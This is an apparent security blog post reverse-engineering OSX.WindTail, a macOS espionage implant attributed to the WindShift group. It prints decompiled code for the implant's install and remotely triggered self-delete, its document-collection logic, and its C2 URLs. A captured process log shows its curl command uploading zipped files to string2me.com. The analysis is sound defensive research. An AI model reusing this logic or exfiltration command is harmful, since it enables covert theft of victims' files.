Middle East Cyber-Espionage

analyzing WindShift's implant: OSX.WindTail (part 2)



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📝 👾 Want to play along? I’ve shared various OSX.WindTail samples (password: infect3d) …please don’t infect yourself!

Background

A few weeks ago, I posted part one of this two-part blog series covering a the macOS exploits and implants used in a Middle East cyber-espionage operation.

In that previous post we covered:

the exploitation vector (custom URL schemes).

finding previously undetected OSX.WindTail samples on VirusTotal

samples on VirusTotal the method of persistence (ab)used by the implant to achieve persistence (launch item).

the decryption of the implants command and control servers ( flux2key.com/ and string2me.com ).

I’d recommend reading (or re-reading!) part one, as it serves as foundation research to this post.

Today, we’ll complete the analysis of OSX.WindTail , detailing it’s installer and self-delete logic, and thru reverse-engineering uncover it’s main capabilities.

The malware’s install logic and capabilities begin with the tuffel method, while the self-delete logic is found within the aptly named mydel method. Both methods are invoked by the malware’s applicationDidFinishLaunching method:

-( void ) applicationDidFinishLaunching: ( void * )arg2 { ... [r15 tuffel]; [NSThread detachNewThreadSelector: @selector (mydel) toTarget:r15 withObject: 0x0 ]; }

In this post, we’ll focus on the sample of OSX.WindTail named Final_Presentation.app

(SHA1: 758F10BD7C69BD2C0B38FD7D523A816DB4ADDD90). This OSX.WindTail sample, along with a few others, may be download from our Mac Malware Collection.





OSX.WindTail Install Logic

As noted, in OSX.WindTail ’s applicationDidFinishLaunching method, the malware invokes a method named tuffel .

Note: The applicationDidFinishLaunching method is a automatically invoked “after the application has been launched and initialized” -apple.com Thus, when analyzing malicious macOS applications, always investigate this method!

To see what class the tuffel method belongs to, we can use Jonathan Levin’s incredible jtool utility. Specifically, via the -v -d objc commandline arguments jtool can dump the embedded Objective-C classes:

$ jtool -v -d objc Final_Presentation.app/Contents/MacOS/usrnode @interface AppDelegate : ? ... // 9 instance methods /* 0 - 0x100001d7d */ - applicationDidFinishLaunching:; /* 1 - 0x100001fc6 */ - mydel; /* 2 - 0x1000021f4 */ - tuffel; /* 3 - 0x10000223f */ - yoop:; ... @end

Via the jtool output, it is clear that this method, (along with other methods such as mydel and yoop ) belongs to the malware’s main AppDelegate class.

By disassembling this method, one can see it allocates and initializes an appdele class, before invoking said class’s sis method:

/* @class AppDelegate */ -( void ) tuffel { rax = [appdele alloc]; rax = [rax init]; self -> tyt = rax; [rax sis]; return ; }

Taking a closer look at the appdele ’s init method, reveals that it invokes a method named cp :

/* @class appdele */ -( void ) cp { r13 = self; var_30 = r13; * qword_100015f20 = [[NSFileManager alloc] init]; r15 = [[NSBundle mainBundle] bundlePath]; rbx = [r15 lastPathComponent]; r12 = NSHomeDirectory(); r8 = [r13 yoop: @"oX0s4Qj3GiAzAnOmzGqjOA==" ]; rcx = r12; rbx = [NSString stringWithFormat: @"%@%@%@%@" , rcx, r8, @"/" , rbx]; ... if (([ * qword_100015f20 copyItemAtPath:r15 toPath:rbx error: 0x0 ] & 0xff ) == 0x1 ) goto loc_10000297b; return ; loc_10000297b: rdi = var_30; rdx = rbx; goto loc_100002989; loc_100002989: [rdi cmd:rdx]; sleep( 0x1e ); exit( 0x0 ); return ;

…yes, a decent amount of logic here, but with the help of some dynamic analysis (via lldb ), it’s not too bad to break down.

First, the malware gets the path to it’s own application bundle via [[NSBundle mainBundle] bundlePath] . After getting retrieving the bundle’s name (via the lastPathComponent method) the malware invokes the NSHomeDirectory function to get the user’s home directory. And what about the encoded, encrypted string, oX0s4Qj3GiAzAnOmzGqjOA== ? That decrypts to “ /Library “:

(lldb) 0x100002873 : movq 0x12bce(%rip), %rsi ; "yoop:" 0x10000287a : leaq 0x10ddf(%rip), %rdx ; @"oX0s4Qj3GiAzAnOmzGqjOA==" 0x100002881 : movq %r13, %rdi 0x100002884 : callq *%r14 ... //after stepping over callq *%r14 (lldb) po $rax /Library

These ‘pieces’ are all passed to the stringWithFormat method, to build the following string: /Users/user/Library/Final_Presentation.app .

OSX.WindTail then invokes the copyItemAtPath method to copy (install) itself to the ~/Library/ directory:

(lldb) po $rdi <NSFileManager: 0x1001221e0> (lldb) x/s $rsi 0x7fff6cabf632: "copyItemAtPath:toPath:error:" (lldb) po $rdx /Users/user/Desktop/Final_Presentation.app (lldb) po $rcx /Users/user/Library/Final_Presentation.app

Via macOS’s built-in file monitor utility, fs_usage , we can passively observe this installation:

# fs_usage -w -f filesystem | grep -i usrnode open /Users/user/Desktop/Final_Presentation.app mkdir /Users/user/Library/Final_Presentation.app ...

Though the normal user won’t likely be poking around in the ~/Library folder - if they did (and their Mac was infected with OSX.WindTail ), the malware is rather hard to miss:

In part one we covered OSX.WindTail ’s persistence (via a login item). This persistence, combined with the above installer logic, completes the persistent install. This of course ensures that the malware will be automatically (re)started anytime the user logs into the infected system.





OSX.WindTail Self-Delete Logic

Recall the malware’s implementation of the applicationDidFinishLaunching method:

-( void ) applicationDidFinishLaunching: ( void * )arg2 { ... [r15 tuffel]; [NSThread detachNewThreadSelector: @selector (mydel) toTarget:r15 withObject: 0x0 ]; }

Note that at the end, the malware spins off a new thread (via the detachNewThreadSelector method), to execute a method named mydel .

/* @class AppDelegate */ -( void ) mydel { ... r14 = [NSString stringWithFormat: @"%@" , [self yoop: @"F5Ur0CCFMO/fWHjecxEqGLy/..." ]]; rbx = [[NSMutableURLRequest alloc] init]; [rbx setURL:[NSURL URLWithString:r14]]; ... if ([[[NSString alloc] initWithData:[NSURLConnection sendSynchronousRequest:rbx returningResponse: 0x0 error: 0x0 ] encoding: 0x4 ] isEqualToString: @"1" ] != 0x0 ) { r14 = [NSFileManager defaultManager]; rdx = [[NSBundle mainBundle] bundlePath]; [r14 removeItemAtPath:rdx error:rcx]; [[NSApplication sharedApplication] terminate: 0x0 , rcx]; } return ; }

In short, the mydel method performs the following:

Generates a URL request from an encrypted string.

Makes a network request to this URL

If the request returns a string that equals “1”: Deletes itself Terminate itself



Via lldb we can set a breakpoint on this method (at address 0x0000000100001fc6 ) then, step thru this code to uncover the (decrypted) URL:

(lldb) b 0x0000000100001fc6 (lldb) c ... -> 0x100002034 : movq 0x1340d(%rip), %rsi ; "yoop:" 0x10000203b : leaq 0x113de(%rip), %rdx ; @"F5Ur0CCFMO/fWHjecxEqGLy/xq5gE98ZviUSLr..." 0x100002042 : movq %r14, %rdi 0x100002045 : callq *%r13 ... //after stepping over `callq *%r13` (lldb) po $rax http://flux2key.com/liaROelcOeVvfjN/fsfSQNrIyxeRvXH.php?very=%@&xnvk=%@

Continuing to single-step over the instructions in this method reveal the full URL: http://flux2key.com/liaROelcOeVvfjN/fsfSQNrIyxeRvXH.php?very=MTUwMTIwMTkxNDI0MDc1&xnvk=ss

Enabling the network adapter in the VM, allows this network request, which we capture in WireShark:





Note: The malware’s command & control server (flux2key.com) currently returns a 403 ‘Forbidden’ error

As noted, if the command & control server returns a string equal to "1" , the malware will self delete, then exit:

/* @class AppDelegate */ -( void ) mydel { ... // if the C&C server returns "1" // then self delete and terminate if ([[[NSString alloc] initWithData:[NSURLConnection sendSynchronousRequest:rbx returningResponse: 0x0 error: 0x0 ] encoding: 0x4 ] isEqualToString: @"1" ] != 0x0 ) { //self-delete [[NSFileManager defaultManager] removeItemAtPath:[[NSBundle mainBundle] bundlePath] ...]; //terminate [[NSApplication sharedApplication] terminate: 0x0 ...]; } ... }

…rather neat to see a “remotely triggerable” self-deletion capability built directly into the malware!





OSX.WindTail Payload/Capabilities

In part one of this two-part blog post, we’ve detailed how OSX.WindTail infects Macs (via (ab)using custom URL schemes), and how it persists (via login items). In this post, we’ve detailed the installer and self-deleting logic. But the question remains, what does the malware actually do. In other words, what is its main goal?

We start in a method called yan . This method is invoked automatically when the malware starts via ( applicationDidFinishLaunching -> tuffel -> ( appdele ) init ). This decompliation of this method reveals little…though it does appear that the method is decrypting a bunch of encrypted strings:

/* @class appdele */ -( void * ) yan { var_30 = [self yoop: @"BouCfWujdfbAUfCos/iIOg==" ]; [self yoop: @"Bk0WPpt0IFFT30CP6ci9jg==" ]; [self yoop: @"RYfzGQY52uA9SnTjDWCugw==" ]; [self yoop: @"XCrcQ4M8lnb1sJJo7zuLmQ==" ]; [self yoop: @"3J1OfDEiMfxgQVZur/neGQ==" ]; [self yoop: @"Nxv5JOV6nsvg/lfNuk3rWw==" ]; [self yoop: @"Es1qIvgb4wmPAWwlagmNYQ==" ]; [self yoop: @"eOA0XJNs/eeFUVMThfZjTA==" ]; [self yoop: @"B/9RICA+yl4vZrIeyON8cQ==" ]; [self yoop: @"B8fvRmZ1LJ74Q5OiD9KISw==" ]; rax = [NSMutableArray arrayWithObjects:var_30]; return rax; }

As the method appears to return an array of the decrypted strings, lets hop into the debugger ( lldb ) and set a breakpoint on the method (address: 0x000000010000238b ). Once this breakpoint is hit, executing lldb’s finish command will execute the entire method, then stop as soon as it returns. Here, we can dump the array of decrypted strings!

Note: The x64 ABI for macOS dedicates that the return value of a method or function is stored in the RAX register. In other words, once a method (of function) returns, simply display what’s in the RAX register, to see what’s returned (e.g. an array of decrypted strings).

(lldb) b 0x000000010000238b (lldb) c ... -> 0x10000238b : pushq %rbp 0x10000238c : movq %rsp, %rbp 0x10000238f : pushq %r15 0x100002391 : pushq %r14 (lldb) finish (lldb) po $rax ( doc, docx, ppt, pdf, xls, xlsx, db, txt, rtf, pptx)

Ah, a list of file extensions… likely ones that the malware is interested in, in some reason 🤔

Next we move on to looking at the fist method (invoked via the df method, which is scheduled via an NSTimer ).

Note: The df method (which invokes the fist method), first invokes a ‘isOK’ method. In a debugger, we can force this check to always succeed (such that the fist method will be invoked) by simply settings the return value to a non-zero value: (lldb) reg write $rax 1

The fist method is rather large, but perusing it’s decompilation reveals it invoking Apple APIs such as contentsOfDirectoryAtPath , pathExtension , and (string) compare . Seems reasonable to assume it enumerating files, perhaps looking for files that match the previously decrypted file extensions?

Setting various breakpoints within the method reveals the malware enumerating and building a list of directories:

(lldb) po $rdi ( /Library, /net, /Network, /private, /sbin, /System, /Users, /usr, /vm, /Volumes, /Applications/App Store.app, /Applications/Automator.app, /Applications/Calculator.app, /Applications/Calendar.app, /Applications/Chess.app, /Applications/Contacts.app, /Applications/Dashboard.app, /Applications/Dictionary.app, /Applications/DVD Player.app, ...

More interestingly, this method adds files that match the (previously) decrypted file extensions ( doc , db , rtf , etc…) to an array (named honk ):

(lldb) po $rdx ( { "KEY_ATTR" = { NSFileCreationDate = "2017-07-26 01:37:05 +0000"; NSFileExtensionHidden = 0; NSFileGroupOwnerAccountID = 0; NSFileGroupOwnerAccountName = wheel; NSFileHFSCreatorCode = 0; NSFileHFSTypeCode = 0; NSFileModificationDate = "2017-07-26 01:37:05 +0000"; NSFileOwnerAccountID = 0; NSFileOwnerAccountName = root; NSFilePosixPermissions = 420; NSFileReferenceCount = 1; NSFileSize = 1159906; NSFileSystemFileNumber = 548707; NSFileSystemNumber = 16777218; NSFileType = NSFileTypeRegular; }; "KEY_PATH" = "/Library/Documentation/Acknowledgements.rtf"; }, { "KEY_ATTR" = { NSFileCreationDate = "2017-09-26 06:58:34 +0000"; NSFileExtensionHidden = 0; NSFileGroupOwnerAccountID = 0; NSFileGroupOwnerAccountName = wheel; NSFileHFSCreatorCode = 0; NSFileHFSTypeCode = 0; NSFileModificationDate = "2017-09-26 07:01:34 +0000"; NSFileOwnerAccountID = 0; NSFileOwnerAccountName = root; NSFilePosixPermissions = 420; NSFileReferenceCount = 1; NSFileSize = 57344; NSFileSystemFileNumber = 890895; NSFileSystemNumber = 16777218; NSFileType = NSFileTypeRegular; }; "KEY_PATH" = "/Library/Application Support/com.apple.TCC/TCC.db"; }, { "KEY_ATTR" = { NSFileCreationDate = "2017-07-15 23:45:04 +0000"; NSFileExtensionHidden = 0; NSFileGroupOwnerAccountID = 0; NSFileGroupOwnerAccountName = wheel; NSFileHFSCreatorCode = 0; NSFileHFSTypeCode = 0; NSFileModificationDate = "2017-07-15 23:45:04 +0000"; NSFileOwnerAccountID = 0; NSFileOwnerAccountName = root; NSFilePosixPermissions = 384; NSFileReferenceCount = 1; NSFileSize = 272; NSFileSystemFileNumber = 869137; NSFileSystemNumber = 16777218; NSFileType = NSFileTypeRegular; }; "KEY_PATH" = "/private/etc/racoon/psk.txt"; } )

For each of the files that the fist method adds to the honk array, the malware invokes a method, aptly named zip , which appears to invoke /usr/bin/zip to create an archive of the file:

/* @class image */ -( void ) zip { r14 = [ @"/tmp/" stringByAppendingPathComponent:[rbx -> m_filePath lastPathComponent]]; ... rax = [r14 stringByAppendingString: @".zip" ]; ... rax = (r14)(@ class (NSArray), @selector (arrayWithObjects:), @"/usr/bin/zip" , * (rbx + r12), rbx -> m_filePath, 0x0 ); rax = (r14)(r15, @selector (initWithController:arguments:), rbx, rax); * (rbx + r13) = rax; (r14)(rax, @selector (startProcess), rbx); return ; }

Via Objective-See’s open-source ProcInfo process monitoring utility, we can confirm that the malware does indeed spawn macOS’s built-in zip utility to create a archive containing containing the file (here for example, a pdf named: StopTemplate.pdf ):

# ./procInfo [ process start] pid: 1202 path: /usr/bin/zip args: ( "/usr/bin/zip", "/tmp/StopTemplate.pdf.zip", "/Applications/Automator.app/Contents/Resources/StopTemplate.pdf" )

Once the file has been zipped up, the malware invokes a method named upload :

/* @class image */ -( void ) upload { ... r14 = [tofg alloc]; if (r12 -> m_State == 0x1 ) { var_30 = [ @"vast=@" stringByAppendingString:r12 -> m_tempPath]; [ @"od=" stringByAppendingString:r12 -> m_ComputerName_UserName]; [ @"kl=" stringByAppendingString:r12 -> cont]; r8 = var_30; rax = [NSArray arrayWithObjects: @"/usr/bin/curl" ]; rdx = r12; rax = [r14 initWithController:rdx arguments:rax]; } else { rax = [NSArray arrayWithObjects: @"/usr/bin/curl" ]; rcx = rax; rax = [r14 initWithController:rdx arguments:rcx]; } [rax startProcess]; return ; }

References to curl ( /usr/bin/curl ) in this method imply the malware is likely exfiltrating the files by (ab)using this built-in network utility.

This can be confirmed via ProcInfo, (which also reveals the network endpoint string2me.com/qgHUDRZiYhOqQiN/kESklNvxsNZQcPl.php ):

# ./procInfo [ process start] pid: 1258 path: /usr/bin/curl user: 501 args: ( "/usr/bin/curl", "-F", "vast=@/tmp/StopTemplate.pdf.zip", "-F", "od=1601201920543863", "-F", "kl=users-mac.lan-user", "string2me.com/qgHUDRZiYhOqQiN/kESklNvxsNZQcPl.php" )

From curl ’s man page, we can see that the -F flag will post data, and when @ is specified, curl will process the input as a file:

-F, --form <name=content>



(HTTP) This lets curl emulate a filled-in form in which a user has pressed the submit button. This causes curl to POST data using the Content-Type multipart/form-data according to RFC 2388. This enables uploading of binary files etc. To force the ‘content’ part to be a file, prefix the file name with an @ sign. To just get the content part from a file, prefix the file name with the symbol <. The difference between @ and < is then that @ makes a file get attached in the post as a file upload, while the < makes a text field and just get the contents for that text field from a file.



Example: to send an image to a server, where ‘profile’ is the name of the form-field to which portrait.jpg will be the input: curl -F profile=@portrait.jpg https://example.com/upload.cgi

A WireShark capture illustrates the exfiltration attempt to string2me.com :

Hooray, we’ve uncovered (and confirmed) that OSX.WindTail s ultimate goal is to persistently exfiltrate files (such as documents) to a remote server. Such a capability fits nicely into any offensive cyber-espionage operation, such as the one orchestrated by the WINDSHIFT APT group.

Note: OSX.WindTail attempts to upload the files to string2me.com. However, this server currently returns a 403 (HTTP Forbidden). Thus, at this point in time, the exfiltration fails.

Conclusion

It’s not everyday that the Mac capabilities of an APT or “nation state” are uncovered. However, OSX.WindTail (belonging to the WINDSHIFT APT group), provided an interesting case-study, of such a tool.

In today’s blog post, we dove into OSX.WindTail , detailing it’s method of installation, self-delete logic, and file-extfiltration capabilities. (See part one for details on the malware’s exploitation/infection vector and persistence mechanism).

Specifically, we showed how the malware’s installs itself into the ~/Library/ , before enumerating and exfiltrating documents and database files.